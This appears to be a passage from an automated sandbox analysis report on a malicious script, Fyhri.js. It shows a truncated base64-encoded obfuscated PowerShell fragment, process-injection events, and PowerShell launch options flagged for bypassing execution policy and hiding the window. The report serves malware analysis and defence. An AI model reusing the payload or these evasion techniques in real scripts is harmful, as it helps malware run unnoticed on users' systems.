AIgA7ACQAUwB0AHUAZABmAGkAcwBoAGUAcwBDAGUAcgBpAGEAbABpAGEAIAA9ACAAIgBwAHIAZQBwAG8AbgBkAGUAcgBhAHQAZQAiADsAfQB9ACQAYwBoAG8AbgBkAHIAZQBjAHQAbwBtAHkAIAA9ACAANwA0ADgAOwBBAG4AZwB1AGwAYQByADsA"
parent_process	wscript.exe	martian_process	wscript "C:\Users\test22\AppData\Local\Temp\Fyhri.js" mostness BorderlandDownhearted Achromatise
parent_process	wscript.exe	martian_process	"C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Local\Temp\Fyhri.js" mostness BorderlandDownhearted Achromatise

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 3008 resumed a thread in remote process 2208
Process injection	Process 2208 resumed a thread in remote process 2312
NtResumeThread May 18, 2023, 9:25 a.m.	thread_handle: 0x00000340 suspend_count: 1 process_identifier: 2208	1	0	0
NtResumeThread May 18, 2023, 9:25 a.m.	thread_handle: 0x00000320 suspend_count: 1 process_identifier: 2312	1	0	0

Creates a suspicious Powershell process (8 events)

option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-nologo	value	Hides the copyright banner when PowerShell launches
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-nologo	value	Hides the copyright banner when PowerShell launches
option	-windowstyle hidden	value	Attempts to execute command with a hidden window

The processes wscript.exe, powershell.exe wrote an executable file to disk which it then attempted to execute (21 events)

file	C:\Windows\SysWOW64\wscript.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

Fyhri.js

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All